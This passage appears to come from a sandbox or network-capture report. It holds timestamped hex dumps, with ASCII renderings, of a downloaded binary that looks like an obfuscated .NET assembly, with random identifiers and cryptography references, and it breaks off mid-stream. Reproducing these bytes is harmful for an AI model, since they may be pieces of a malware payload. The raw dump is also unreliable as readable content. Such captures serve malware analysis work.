00 53
                                                                                                                                                        Data Ascii: evu8KkjDBqKusHufMKeAsqCDVwVFMfe2RQxRslZ3qwMWRMffSLMcmKTYlZnPeciRIR3E7gJIsLittleEndiandgRINPwmMqo5IIruQBs7PfPIbuThdlMfnIPRJk1YbPAIDfkfu7w0yI4nQoepTbGIMpUu5XjhJI63T0tNFSuITfdFcrxDQ90pb1KUcgm8ioBmgrImIhEtLPjUlsIi2d2qDSeUI5ROQ4UveGIAwTQTsS
                                                                                                                                                        2021-12-28 02:23:24 UTC122INData Raw: 53 34 42 6a 67 43 79 71 51 49 00 54 59 71 69 66 63 79 6c 77 6d 36 50 4f 65 51 4d 53 69 71 00 66 30 75 51 33 55 79 7a 58 74 55 64 35 76 33 47 75 4a 71 00 6a 32 62 69 65 56 6f 6e 6c 44 00 63 6d 46 69 58 48 61 6f 62 39 00 6b 51 43 63 79 6b 74 78 4b 45 35 71 4c 4f 4a 57 71 65 48 00 54 69 54 43 73 38 74 72 70 65 5a 59 54 5a 36 5a 36 79 51 00 62 44 6a 39 62 46 74 67 37 4d 4e 56 66 74 39 50 4d 43 4a 00 54 75 31 69 73 45 33 72 4c 43 00 4a 75 57 69 71 39 43 33 46 66 00 72 58 41 32 41 54 74 4e 54 6e 74 4b 67 6e 50 6d 67 6d 66 00 45 71 75 61 6c 73 00 47 65 74 48 61 73 68 43 6f 64 65 00 45 6e 75 6d 65 72 61 74 6f 72 00 6a 46 32 69 63 75 49 6f 61 6a 00 70 31 55 69 4b 36 43 34 31 4a 00 69 51 6e 4f 33 56 74 62 6c 67 53 6b 65 55 61 57 59 64 70 00 76 77 61 78 46 32 74 44
                                                                                                                                                        Data Ascii: S4BjgCyqQITYqifcylwm6POeQMSiqf0uQ3UyzXtUd5v3GuJqj2bieVonlDcmFiXHaob9kQCcyktxKE5qLOJWqeHTiTCs8trpeZYTZ6Z6yQbDj9bFtg7MNVft9PMCJTu1isE3rLCJuWiq9C3FfrXA2ATtNTntKgnPmgmfEqualsGetHashCodeEnumeratorjF2icuIoajp1UiK6C41JiQnO3VtblgSkeUaWYdpvwaxF2tD
                                                                                                                                                        2021-12-28 02:23:24 UTC126INData Raw: 5f 30 66 38 35 33 63 39 61 66 34 65 35 34 61 30 64 39 35 36 63 36 66 63 30 62 63 38 63 39 32 37 38 00 6d 5f 65 35 61 37 63 31 63 39 37 31 30 34 34 31 65 35 38 61 65 37 39 65 39 62 39 66 33 36 39 61 30 63 00 6d 5f 65 63 65 36 35 61 65 32 31 35 61 37 34 61 30 30 39 61 33 39 65 37 31 61 65 33 34 31 63 61 35 62 00 6d 5f 36 62 30 66 62 65 37 38 32 66 63 38 34 34 32 62 61 39 39 32 37 35 61 38 33 38 65 30 33 38 30 66 00 6d 5f 39 34 37 38 30 37 37 38 66 33 34 30 34 38 30 62 61 37 36 39 36 35 37 37 37 30 30 35 66 62 31 37 00 6d 5f 33 62 30 64 65 64 65 64 30 37 36 34 34 64 30 62 62 32 38 37 61 39 37 36 36 31 61 35 64 66 33 66 00 6d 5f 61 31 33 37 63 32 62 30 35 33 62 62 34 62 66 66 39 62 30 33 34 37 36 61 63 36 36 34 65 63 37 35 00 6d 5f 37 61 36 37 38 33 30 33 62
                                                                                                                                                        Data Ascii: _0f853c9af4e54a0d956c6fc0bc8c9278m_e5a7c1c9710441e58ae79e9b9f369a0cm_ece65ae215a74a009a39e71ae341ca5bm_6b0fbe782fc8442ba99275a838e0380fm_94780778f340480ba76965777005fb17m_3b0deded07644d0bb287a97661a5df3fm_a137c2b053bb4bff9b03476ac664ec75m_7a678303b
                                                                                                                                                        2021-12-28 02:23:24 UTC129INData Raw: 58 37 50 72 4d 68 46 69 55 6c 00 42 57 62 72 4f 52 34 59 50 53 00 52 47 5a 72 36 4b 4c 76 49 4e 00 63 67 6b 72 70 48 44 30 50 62 00 48 6e 43 72 52 34 64 65 71 50 00 41 68 6e 72 37 70 46 58 56 6e 00 56 59 70 72 30 56 49 63 30 45 00 45 74 75 72 61 77 62 45 67 57 00 6d 47 34 72 59 4b 54 4c 5a 4d 00 44 5a 51 72 76 31 56 39 38 50 00 4f 6a 6e 72 6b 63 54 6b 35 52 00 4a 44 74 72 47 44 6a 4e 72 72 00 59 6b 67 72 46 46 63 41 74 38 00 4f 42 79 72 58 43 4e 51 6d 6e 00 64 62 59 72 42 64 44 4b 38 32 00 58 6e 53 72 51 58 4c 37 62 50 00 59 74 5a 72 45 74 50 56 62 64 00 4e 69 77 72 50 6d 67 33 47 69 00 61 4f 31 72 6f 74 4c 62 4c 77 00 55 71 42 72 6a 66 4a 63 64 31 00 76 6a 4a 72 39 6a 61 49 50 70 00 4c 37 48 72 6c 33 68 55 61 68 00 62 50 37 67 72 34 59 36 49 72 00 44 6a
                                                                                                                                                        Data Ascii: X7PrMhFiUlBWbrOR4YPSRGZr6KLvINcgkrpHD0PbHnCrR4deqPAhnr7pFXVnVYpr0VIc0EEturawbEgWmG4rYKTLZMDZQrv1V98POjnrkcTk5RJDtrGDjNrrYkgrFFcAt8OByrXCNQmndbYrBdDK82XnSrQXL7bPYtZrEtPVbdNiwrPmg3GiaO1rotLbLwUqBrjfJcd1vjJr9jaIPpL7Hrl3hUahbP7gr4Y6IrDj
                                                                                                                                                        2021-12-28 02:23:24 UTC133INData Raw: 00 4a 00 62 00 50 00 77 00 3d 00 3d 00 00 15 6a 00 75 00 52 00 56 00 68 00 6d 00 63 00 77 00 63 00 56 00 00 80 9d 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 43 00 6f 00 72 00 65 00 2c 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 3d 00 33 00 2e 00 35 00 2e 00 30 00 2e 00 30 00 2c 00 20 00 43 00 75 00 6c 00 74 00 75 00 72 00 65 00 3d 00 6e 00 65 00 75 00 74 00 72 00 61 00 6c 00 2c 00 20 00 50 00 75 00 62 00 6c 00 69 00 63 00 4b 00 65 00 79 00 54 00 6f 00 6b 00 65 00 6e 00 3d 00 62 00 37 00 37 00 61 00 35 00 63 00 35 00 36 00 31 00 39 00 33 00 34 00 65 00 30 00 38 00 39 00 00 6b 53 00 79 00 73 00 74 00 65 00 6d 00 2e 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 2e 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00 79 00 2e 00 41
                                                                                                                                                        Data Ascii: JbPw==juRVhmcwcVSystem.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089kSystem.Security.Cryptography.A
                                                                                                                                                        2021-12-28 02:23:24 UTC137INData Raw: 1c 09 07 00 02 12 80 91 1c 02 07 00 02 12 80 91 0e 02 09 00 02 02 12 80 91 12 80 91 05 20 00 12 81 7d 05 20 00 12 81 59 05 00 02 02 1c 1c 05 20 00 12 81 85 04 00 01 08 1c 09 00 02 02 12 81 49 12 81 49 04 00 01 02 1c 05 00 02 1c 1c 1c 05 00 02 01 1c 0a 04 00 01 0a 1c 05 00 02 1c 1c 08 06 00 01 01 12 80 e9 06 00 03 01 1c 08 08 08 00 03 01 12 80 e9 08 08 06 20 00 1d 12 80 bd 06 00 01 18 12 80 bd 07 00 02 01 1c 11 81 89 06 20 01 01 11 81 89 06 00 03 1c 1c 1c 1c 09 20 02 12 80 a1 1d 05 1d 05 07 00 04 01 1c 1c 08 08 04 00 01 1c 08 05 00 01 1d 05 08 05 00 02 01 18 08 06 00 03 01 1c 1c 1c 04 00 01 08 0a 07 00 02 1c 18 12 80 91 04 00 01 0a 18 06 00 01 18 12 81 39 05 20 00 12 80 c5 09 00 02 02 12 80 c5 12 80 c5 07 00 02 1c 12 80 91 1c 06 00 01 11 81 5d 1c 05 20 00
                                                                                                                                                        Data Ascii: } Y II 9 ]
                                                                                                                                                        2021-12-28 02:23:24 UTC142INData Raw: 0b 00 02 12 80 91 12 80 91 12 82 90 04 06 12 82 94 07 20 02 1c 12 80 91 08 0a 00 03 1c 12 80 91 08 12 82 94 04 06 12 82 98 07 20 02 1c 12 80 91 09 0a 00 03 1c 12 80 91 09 12 82 98 04 06 12 82 9c 07 20 02 1c 12 80 91 06 0a 00 03 1c 12 80 91 06 12 82 9c 04 06 12 82 a0 07 20 02 1c 12 80 91 07 0a 00 03 1c 12 80 91 07 12 82 a0 04 06 12 82 a4 07 20 02 1c 12 80 91 05 0a 00 03 1c 12 80 91 05 12 82 a4 04 06 12 82 a8 07 20 02 1c 12 80 91 04 0a 00 03 1c 12 80 91 04 12 82 a8 04 06 12 82 ac 07 20 02 1c 12 80 91 0a 0a 00 03 1c 12 80 91 0a 12 82 ac 04 06 12 82 b0 07 20 02 1c 12 80 91 0b 0a 00 03 1c 12 80 91 0b 12 82 b0 04 06 12 82 b4 06 00 01 08 12 82 b4 04 06 12 82 b8 05 20 01 0e 10 08 08 00 02 0e 10 08 12 82 b8 04 06 12 82 bc 05 20 01 0e 10 09 08 00 02 0e 10 09 12 82
                                                                                                                                                        Data Ascii:
                                                                                                                                                        2021-12-28 02:23:24 UTC146INData Raw: 93 92 7a fd 47 87 30 1b 7e b1 7e 33 84 a7 45 f9 39 39 48 fa 9e b3 e8 c6 e8 2c 66 84 ff d8 c4 7d c2 c9 04 5a 60 79 e5 4b 9e 2d 67 ee 5d 21 f1 8e b4 f5 02 e1 20 9d 72 fb d4 77 b7 a7 35 24 f4 01 aa de 1c 9c d5 4a d6 bd 8f f5 c2 29 68 08 1f 93 24 61 fe 88 0c a3 2a 77 d5 aa 00 a6 05 75 52 c1 4c b7 4c 4d ff c5 8e ac 8a 2f 4b 73 8e 73 fe 07 ea 52 e4 bf 59 6f 5a 92 a9 d7 b5 63 cd 89 e7 59 77 d8 6c 68 7d 77 c3 52 c2 02 de 24 bc 35 35 80 cf a4 e1 c3 ff 20 ff fb a8 b0 85 47 e4 60 0b 43 9d 8d bd 76 a3 43 68 9e ae 57 92 f7 ad b9 e2 14 70 17 aa 5b ae 00 97 25 db 22 b2 fd 06 08 6c b8 57 04 15 88 53 df 23 77 cb ad e3 a2 12 8c c0 ba fd a6 90 0e cb 32 67 c7 6c 44 41 a0 a2 26 32 0a 44 94 27 7a 48 2a 7c eb 0a 04 93 89 25 22 94 d5 2b 2b 66 e6 f7 79 54 c1 7a 95 96 81 06 5b ac
                                                                                                                                                        Data Ascii: zG0~~3E99H,f}Z`yK-g]! rw5$J)h$a*wuRLLM/KssRYoZcYwlh}wR$55 G`CvChWp[%"lWS#w2glDA&2D'zH*|%"++fyTz[
                                                                                                                                                        2021-12-28 02:23:24 UTC150INData Raw: 1f 1f c8 7a 1d 29 07 9a 40 2c a6 5b 8b 3b 38 7f 42 a3 a8 8d e6 1a 5a b1 6e e2 41 da 2c 24 ac 0f bf ac 0b cf 68 f9 88 52 76 2c 56 8c 97 47 f2 bd 6d 69 42 a1 e5 55 9e c4 79 58 21 69 55 3c d5 57 10 ad 43 f1 08 37 60 6c 07 e3 05 0e 8d 12 3a 6f b1 6a 99 a2 ed d3 00 a2 ba a9 65 89 77 c5 eb 35 26 9e 3a 01 00 92 c8 fb db ec c8 26 85 c4 26 21 b3 c9 c9 8c fb 2e 05 f6 77 42 3a 86 60 4c c2 97 7c 63 15 3d 05 16 1c ea f7 51 d3 f7 66 f7 70 20 17 98 e3 62 76 98 48 05 c7 b2 76 ef 39 69 2b bb 59 52 41 db d1 34 df 3d 2e 17 4b 01 c2 de ca 41 7f 40 3e 2c 91 23 2e c0 a2 42 52 10 c1 00 86 17 81 f5 e6 71 25 b5 30 03 f1 0d a8 ed 51 87 1b 4a a5 cc 52 de 74 9a 34 8a d7 79 bd 3d 88 b3 d6 ac 8e f6 6a 52 07 1b 02 97 ec bb c5 80 49 ba 54 c1 08 2b 63 61 b8 4e d1 36 a6 c1 d5 88 be 61 25
                                                                                                                                                        Data Ascii: z)@,[;8BZnA,$hRv,VGmiBUyX!iU<WC7`l:ojew5&:&&!.wB:`L|c=Qfp bvHv9i+YRA4=.KA@>,#.BRq%0QJRt4y=jRIT+caN6a%
                                                                                                                                                        2021-12-28 02:23:24 UTC154INData Raw: ae c7 ac 65 7b 71 3e df c7 01 71 5b f3 e0 04 95 b6 6b 11 38 2e 80 cc 26 18 1e 9f 35 bf e5 4b 46 21 45 49 c1 34 58 c4 0d 0e b3 7f 50 b8 fa ad aa 3b 41 9b c8 b3 c2 a2 ac 02 e0 16 ea 88 0e 69 71 1f 32 15 b5 66 e1 c4 52 c3 40 9b b9 11 69 ec 90 e5 79 6c 7e 15 13 61 b3 cd 22 9d a4 28 4f 5d 77 2e a5 3a db ef 70 57 4e 32 34 ab 33 6a 98 45 8b c7 e2 69 91 65 f0 0c 56 ca 40 e3 1b b3 f5 eb 9a 9a 8a 6e 1f b9 d6 cc f1 98 3c 5d c9 06 67 9c 9e d7 ef 3e 48 9f da ce 61 3b df 30 21 4e 46 25 3e b7 3d 19 ab 5b 72 39 f4 55 04 7e 41 19 bf 0c 6d a7 49 a3 b6 27 28 f2 f1 a2 27 f5 92 e9 df 4e 7a 63 5d d1 74 fd e7 e0 28 8a 91 5a 05 9f f1 e3 7d 9d 64 09 4f c8 1c a9 be 3b 9b a1 9a 0b d3 aa bf e2 e8 71 1b 82 ed f1 6e 65 ad 6a c2 56 c0 71 ec fa 1b 85 04 ee 8d f9 bc 4a 96 86 1a b7 c8 9b
                                                                                                                                                        Data Ascii: e{q>q[k8.&5KF!EI4XP;Aiq2fR@iyl~a"(O]w.:pWN243jEieV@n<]g>Ha;0!NF%>=[r9U~AmI'('Nzc]t(Z}dO;qnejVqJ
                                                                                                                                                        2021-12-28 02:23:24 UTC158INData Raw: 53 0c 73 75 8c 48 eb 1b af ae e2 de 28 53 ca fd ca 03 5b 25 21 23 6f 48 8e 1b 84 fb 76 68 37 cc cb da 10 eb b8 44 f8 3e ff 9f 15 36 4e 32 7d 90 d1 74 60 14 df 6a 7d ce c9 fb ab 8c a2 03 c4 9a 7d 3e 9f bd 18 8d 1d b8 7d da 5b 16 b5 1c 78 38 3a 0e 33 35 7c df 86 38 19 f8 f7 d2 8b 81 4b 35 e0 2d 2c 80 5b 04 e1 80 46 63 07 08 46 16 73 5e 6f 93 90 b6 65 b6 58 01 bd ec f4 49 0f e8 22 65 36 32 54 c1 99 f8 f4 70 a0 88 30 83 84 8a d3 50 20 80 8a a7 6d 0f 73 6b a3 49 27 e4 2b 14 b3 3f 40 20 9a fb 06 cd 4b 47 a6 c0 99 08 1f a0 f7 c9 ba f1 30 02 7a 8d 89 2c 0f a7 3f 74 e1 b3 e8 6b 7d be 50 ca 9e 0e e6 de df 94 4a 4c b9 d1 87 41 aa 71 2d 88 b1 d4 99 44 c1 fb c8 9b e4 2f b5 43 7a 9d 77 18 b4 de 41 e1 64 92 f6 cd e9 fa b3 eb 6a 95 54 c3 b8 9d 03 27 31 e4 4c cb 92 e2 0e
                                                                                                                                                        Data Ascii: SsuH(S[%!#oHvh7D>6N2}t`j}}>}[x8:35|8K5-,[FcFs^oeXI"e62Tp0P mskI'+?@ KG0z,?tk}PJLAq-D/CzwAdjT'1L
                                                                                                                                                        2021-12-28 02:23:24 UTC161INData Raw: 56 60 73 7c dd 1f 52 04 b1 4b 01 40 5e 9a 55 aa ff 85 99 af c6 94 61 dc 2a ce 36 af cb 6d c1 06 5c 9f 11 38 a7 ac 15 42 3b f7 7b 2a 8a c3 19 3d 67 50 07 d6 55 25 b1 8e 33 51 ea a3 65 6e ef cb c4 3a d2 d1 93 54 e8 4f 41 fe 12 7a cf 17 e5 b5 59 c5 76 5f 26 91 1c db df 28 ee e2 a0 33 c0 b5 f2 72 15 90 81 a0 df ff 44 39 fc df 31 24 4a e6 60 c4 0f 40 71 ba 89 09 6c 82 05 41 d3 99 05 97 54 85 46 80 df fb 5c 71 05 e8 0d db ab dd 98 e7 59 d9 0a b0 61 34 06 33 f9 df 99 42 e1 d4 cc 87 5d fa f8 01 4b aa db 1f b6 85 e1 57 f2 76 1c 47 d8 fc 44 9b 3b 66 8c dd 4c 9d c3 60 f5 2a 8e d0 79 61 0d 27 2c 77 45 44 c9 a6 5f 3f 7f d4 01 a0 1e e6 99 00 db b8 db b8 df a1 9a 6a cc 5d 3f 5c fc 13 68 82 12 b3 7f e7 dd 4a ef 24 c5 24 fe 38 86 36 37 99 95 30 e8 38 e2 ca 85 4b a6 fd cd
                                                                                                                                                        Data Ascii: V`s|RK@^Ua*6m\8B;{*=gPU%3Qen:TOAzYv_&(3rD91$J`@qlATF\qYa43B]KWvGD;fL`*ya',wED_?j]?\hJ$$86708K
                                                                                                                                                        2021-12-28 02:23:24 UTC165INData Raw: 19 59 6c da 06 c6 16 0f 9b c2 af ce 33 7f 7b 78 e7 63 f8 3b 3e 60 b0 3f 2a 33 5a 67 4f 8f 4e 37 e6 cd b2 1e df 08 a6 b2 c0 59 f6 0d ba f9 ca 24 09 af 65 20 30 b8 a0 80 e8 fb 0d 97 53 67 7b 18 a9 f9 26 3e 3b d0 ab 5b 94 16 15 7b 06 1c 52 9e f3 20 f0 6f 84 1a 94 19 75 a1 f9 c4 8a eb 39 0c 5e 59 ac 8a 73 1b 9f 8d 89 cd 68 5d be 9c e1 b5 fa fa 73 9e 64 2e 73 77 78 ed 11 62 3f 24 f6 a7 e8 f3 5c 7f 6d 9f 0d 37 53 1a b9 e8 20 92 62 70 14 19 b0 08 e8 13 7b 63 25 a4 8e 19 70 8f 05 58 04 a7 f3 ef 26 05 26 ad 33 a7 15 f9 94 ae be 8f 81 bf 57 8d c5 6d cb fc 7c 8c 0e ab 26 af b0 5b 0c 64 94 1b e1 d1 be b0 d2 67 4a 65 f1 f3 03 d5 54 ee d3 76 25 e4 6f d4 1a bb c5 e2 5a f2 99 69 35 87 82 42 08 e2 48 8b 8a fe 8c 0f 56 6e e3 16 db 46 e6 1e d1 7a 2c 37 76 8a 2e a3 3e 17 46
                                                                                                                                                        Data Ascii: Yl3{xc;>`?*3ZgON7Y$e 0Sg{&>;[{R ou9^Ysh]sd.swxb?$\m7S bp{c%pX&&3Wm|&[dgJeTv%oZi5BHVnFz,7v.>F
                                                                                                                                                        2021-12-28 02:23:24 UTC169INData Raw: b6 60 01 c4 c0 a4 f8 c2 07 0d d2 e5 8d 86 c4 eb 7a 17 c8 62 a6 aa 55 86 e7 d9 4a 2e a7 fc fc 77 86 f0 6b cb 05 5c da 82 f2 69 4d bd eb 87 ea 8f 08 63 dc cd 7e 39 c8 ec 05 9b 71 32 1a fb 05 53 2e 96 9c e3 85 af ef e5 25 b3 a4 4f 34 0d 81 34 77 58 1c 19 36 85 45 aa 14 b4 81 af 74 7f ed 43 1e 93 80 ee df 18 01 fe 64 0f 01 f8 07 0a a8 48 13 6f f7 66 50 9e 3c a7 66 9a bb 7b b9 c6 b7 96 c2 b8 d1 8b 9a 78 f0 3b 40 4b 58 3e 15 4d e0 8d 58 e0 e3 90 af a2 f3 08 5c cc 13 34 d9 96 08 e6 fe 87 2c b7 e4 f7 89 b8 28 8b 30 37 92 c1 23 f4 41 6d 24 c0 11 ca 7f 44 54 94 9e 97 fb 15 4f df 42 d6 73 2b c0 f0 1d 45 4b 46 45 1d ae 25 7c f4 35 65 79 bf da 64 99 ff 90 62 99 77 6a 1f 50 7c cd e3 8e 4e 5e 65 67 94 d4 90 1a e5 4b 95 cd f3 b9 a2 2d e9 9a 4f 96 4d d7 e9 63 7e f8 ee 27
                                                                                                                                                        Data Ascii: `zbUJ.wk\iMc~9q2S.%O44wX6EtCdHofP<f{x;@KX>MX\4,(07#Am$DTOBs+EKFE%|5eydbwjP|N^egK-OMc~'
                                                                                                                                                        2021-12-28 02:23:24 UTC174INData Raw: ca 38 46 96 03 ac dd c6 ba f0 6f f7 ac ca 80 1c d6 5d dd ea 75 68 cc ba a9 90 f9 19 2e 16 69 c8 84 4f 6d b0 5a 5d b1 7c f3 6f cb 89 a0 bc 36 74 9d ac a4 b7 c4 4f 2c a1 81 be 1e de d6 d5 40 22 73 e8 65 c8 92 f3 1b 6e f0 de 19 ad ec 7d ce 30 56 da 13 8c ac 25 9f 91 98 d2 63 15 ab d9 61 38 c5 f7 88 bb a8 04 11 f5 5b e1 da a8 6f 7d 88 a8 33 a7 ce ed f1 9c dd 63 e7 87 80 9b 34 ee 04 7e fd 50 d8 37 97 71 cc ba fe ec 00 d6 25 ac 70 e5 0b db 33 ab 61 88 d6 12 4b 7a bc 67 5f 52 5a 05 fb 7f b6 b0 4c d5 e6 58 50 13 47 67 36 8f 5d bd bb 74 45 1f 31 b3 10 f9 4a af 05 82 43 fd 63 2c 3c 7c 69 4e 6c 3b 5c 6c 9c 3b 97 53 b1 9f 1e 80 25 46 7f fb 49 f6 09 e5 65 4f 17 bc 11 2d d0 1e eb f3 0c 7f 78 bb ba e4 50 ba a8 f2 ae 45 e0 c5 3b 19 37 fa fc a4 42 d9 79 8b e7 1b 2d e6 6a
                                                                                                                                                        Data Ascii: 8Fo]uh.iOmZ]|o6tO,@"sen}0V%ca8[o}3c4~P7q%p3aKzg_RZLXPGg6]tE1JCc,<|iNl;\l;S%FIeO-xPE;7By-j
                                                                                                                                                        2021-12-28 02:23:24 UTC178INData Raw: 79 89 7e 68 a2 de 84 26 2c b7 e2 24 4f 1f 4b e1 b7 92 58 58 04 4e 77 86 0b 06 d6 1c e5 55 70 be 3d 18 bd 43 b0 6d 39 5d 4f c4 6e ad d7 bb 86 5e b1 e0 cf f5 f0 1f 21 6b e6 c3 6b 35 62 8a 0e d9 51 f8 e0 cd f3 56 a4 09 1d 93 32 2c 01 fb b9 03 35 f0 fb 32 e9 68 7d c6 83 69 e2 7c 85 b2 c0 d6 72 4a 48 cb b4 47 07 53 c7 b4 bc 71 43 db 48 e5 4c 15 c1 51 c1 4c 62 a8 e4 fd 61 89 e5 47 f6 5b 11 ab ba 28 e2 6a ff 93 a7 41 e7 0e 89 42 dd 8d 1e 2b 78 95 07 76 8b a2 2a 22 3e af d0 fc 35 74 8a b1 fe 0b 64 32 f4 12 5a 07 b5 a9 31 b1 cc 44 c4 0c 24 1c 23 10 41 90 5f a3 98 89 0f a3 3e 91 c4 15 9a 56 c1 bc 41 bd df 5f d3 40 09 b2 f1 5a 7d 3b 43 08 e9 73 56 bf c7 18 8d 6d 0a 7e 3a a7 0a 2e e8 10 3a 9c 42 ba d8 db e8 83 a3 85 9e 27 0b f5 9b 7b 8b 03 fa 2a 58 64 00 a9 67 e3 83
                                                                                                                                                        Data Ascii: y~h&,$OKXXNwUp=Cm9]On^!kk5bQV2,52h}i|rJHGSqCHLQLbaG[(jAB+xv*">5td2Z1D$#A_>VA_@Z};CsVm~:.:B'{*Xdg
                                                                                                                                                        2021-12-28 02:23:24 UTC182INData Raw: ae 1d b1 1a f2 45 22 cb ff 56 6d ce 93 45 0f 44 14 21 fb 29 c4 df 7b 0f fd 92 ae 42 46 7b 12 2a d5 95 7b d3 f9 7d bc eb b3 ae 36 1d 7b c1 6c 5f 69 a2 e4 4a dc 07 86 09 a9 55 73 df 84 09 fc ba a5 24 cd 73 75 4c 8d 86 ac ea 0b 47 7a b9 a6 e0 70 41 bd f5 c8 5b f6 3a 26 67 7d ed 5a 72 0b d0 fb 2e 65 ca 66 1e aa f0 71 d4 ab b9 21 ad 80 e2 06 da 22 02 23 54 41 8e 17 a4 01 96 05 18 59 a5 51 56 ca 46 81 8d f9 02 02 84 17 09 c4 67 7c f4 1a ae a3 a9 30 59 20 63 05 a9 a6 e0 36 cc d9 6c d2 22 2e 1b 22 a0 bb cb 0d 9d 95 cc 27 61 c7 31 ea ad e9 f7 8f fb 74 57 8c cb ca 86 47 21 3e cc fb 29 d6 2a bf db 29 0d 03 1a f7 3c cd 71 7e 7b 22 22 15 fa ae 2a 45 5e 36 25 62 48 f7 dd 4f 58 13 d0 c5 bd 48 af 13 dd bb b4 e8 8f 17 4b c8 94 b7 cf 7f 12 85 62 d0 0f 19 28 33 9e 02 24 ac
                                                                                                                                                        Data Ascii: E"VmED!){BF{*{}6{l_iJUs$suLGzpA[:&g}Zr.efq!"#TAYQVFg|0Y c6l"."'a1tWG!>)*)<q~{""*E^6%bHOXHKb(3$
                                                                                                                                                        2021-12-28 02:23:24 UTC186INData Raw: dd 04 6e e0 9c be 51 26 de ed 6f b1 1e b3 98 94 fa 5e 75 dd 4c 54 68 51 0f 2c ec 75 82 3c 52 3b 53 a6 20 48 8c 85 08 4e db c9 d8 36 3d 8f 7a 41 ce 8b f5 a1 b3 b7 5c 55 ee 8d ce 8c 42 5e 32 f6 73 73 cd d6 28 19 8a cb 91 9e 9a 22 af 48 cd 39 47 e3 c6 49 25 54 f2 7f 36 75 3f 67 d1 6f 62 f5 14 5a f9 52 cf f8 99 1d 9c f3 cb e3 b1 c9 af ab 90 a7 4e e9 68 54 db 2a aa ee 97 82 de fd 28 17 70 12 4a aa 2c 28 f1 48 58 5a 8b 24 e5 e2 48 fc c6 7c 9e fd 91 3f 97 fc 08 ec 1c 31 57 72 23 61 bd 60 e1 f7 61 43 12 a6 6e 0e 41 a2 58 58 b3 b7 2f 6e 2f 04 e0 07 40 24 a7 8e f9 79 d9 7b 46 d9 5f ac 3f 29 ef dc 62 e4 8d d2 fe 7a f2 cc e4 67 92 16 fd ac e6 42 d2 07 6b 98 5f a6 6d 6f 0f 5d f3 f2 b1 1d 42 9f 71 e4 5f 1b 29 01 9b 0d 06 be c0 57 c2 9e 40 e6 d3 bd 21 26 f0 d4 d6 02 21
                                                                                                                                                        Data Ascii: nQ&o^uLThQ,u<R;S HN6=zA\UB^2ss("H9GI%T6u?gobZRNhT*(pJ,(HXZ$H|?1Wr#a`aCnAXX/n/@$y{F_?)bzgBk_mo]Bq_)W@!&!
                                                                                                                                                        2021-12-28 02:23:24 UTC190INData Raw: 1f 5e e9 8e 49 01 84 0e cc 7a f8 62 64 a7 02 0a c7 7d 41 d5 f8 a6 7d 95 66 65 23 59 a9 15 ec 09 b1 a6 d1 89 c9 c2 7a db e9 69 af b4 cb b3 e4 5a 6c a8 80 5a 98 aa 8f a8 27 21 f7 fc a7 c1 2a c7 ff ad b9 6a 6d 67 ed 57 cc 81 32 65 d9 0b c0 6b 28 a1 a3 b2 0f 5e 38 70 a4 f7 f5 41 72 c3 36 64 f8 16 ef fb a2 eb 7d 84 bc c6 82 24 d9 8b c2 25 33 0e ca fb 94 bf 0a f5 ca ad 60 82 24 32 0a 05 92 30 02 81 fb d4 f5 09 9d 93 7f 15 22 ce 79 b3 7d ef a9 43 3b 3f 42 1c 2a d8 a8 6c 91 e8 8d a1 ec 32 29 42 62 57 96 89 b7 a0 b2 ee ea d8 c8 17 02 cc b8 53 4e 8f b8 e1 32 ad c8 fe 52 11 41 e9 b3 91 ea d1 50 85 5c 7a 32 88 91 6e 74 60 bd 78 b7 4b 5f 5e 9a 5c e2 41 44 c1 30 28 52 7c 7e 0f 08 88 4e 2a 95 0a 17 b9 38 45 87 f7 0f 48 06 43 bc 30 e4 4b 75 cc d5 54 52 b6 94 66 10 58 f5
                                                                                                                                                        Data Ascii: ^Izbd}A}fe#YziZlZ'!*jmgW2ek(^8pAr6d}$%3`$20"y}C;?B*l2)BbWSN2RAP\z2nt`xK_^\AD0(R|~N*8EHC0KuTRfX
                                                                                                                                                        2021-12-28 02:23:24 UTC193INData Raw: 4b 33 7c 1c d6 2c ec d3 20 69 42 c5 ac a4 a4 72 eb 9e 29 75 16 f8 2c 61 c5 82 05 3f 02 c5 f7 a1 01 23 84 a1 40 20 bb 04 30 c4 18 cd ba 66 12 eb 75 d5 2c 09 e8 73 1b 5f 17 65 7f cc ad dc 52 a9 50 02 e2 06 c8 84 dd 0d be ea 4c 4b c6 a6 b9 0e a5 42 fe 31 89 5a 29 51 70 00 5e 70 45 51 33 bb 77 17 78 2a c4 0a cd ce 8b 6e a3 58 37 ed 97 0a e9 23 e4 ae 30 bf d8 34 f5 fb 0d 91 a0 67 6e b9 08 5e 53 d5 35 00 ac 9e 69 31 73 87 28 af af 97 0b 04 54 b3 45 86 4b e9 c7 47 ec f8 d0 cd d2 bd 99 04 11 83 55 da db b8 7b a7 bd 78 f4 be 7f b2 7a 98 97 dd 6f 75 33 50 ac b8 72 99 3a d2 87 aa cd 46 2b 1f 00 75 fc 6a ac 93 40 bb ad 7c 99 34 9f 0b 4d 8a 2c c8 a1 b5 5b b9 f6 dc 4d 58 c1 83 24 a1 7b a4 61 69 38 cc 0b ee 41 14 53 3f 5a fd 6d 11 28 61 e1 9b 6f 6c f5 64 19 ae 31 24 67
                                                                                                                                                        Data Ascii: K3|, iBr)u,a?#@ 0fu,s_eRPLKB1Z)Qp^pEQ3wx*nX7#04gn^S5i1s(TEKGU{xzou3Pr:F+uj@|4M,[MX${ai8AS?Zm(aold1$g
                                                                                                                                                        2021-12-28 02:23:24 UTC197INData Raw: 21 ce 15 6b 30 94 87 91 9b 18 a8 eb 11 6d 5b ac 12 45 a1 dd 3a c4 d4 86 1a bb 1c 8e d6 9a 8b 72 96 bf 35 4c 33 a3 f8 a7 26 c6 f6 70 55 93 39 b5 33 c9 15 76 8b ed 0c d2 a4 7a de a9 12 02 4e 00 f5 be 57 bb f8 00 74 3f d3 e8 5c 11 67 41 6d c9 e6 c9 22 75 4e f8 5c 13 b9 7b c4 ec 67 de cf 1d 40 a7 5c 0b c6 87 82 d7 93 f4 21 ca 01 86 82 95 81 fc c1 99 30 5a 75 b7 50 d7 fc a1 3a f7 ee c3 35 e7 ee 48 da bc 66 f4 30 fd 29 4a 7d 9b dd 0d 6f a1 32 c4 53 eb 7d f4 33 61 43 7b 5a f6 97 ee 38 11 7f 28 7e d8 8c 41 30 8a 06 cd 49 2e 37 d8 49 3c 9e cd dc dc a3 3d 47 bd 34 16 1b ee b8 02 66 4c 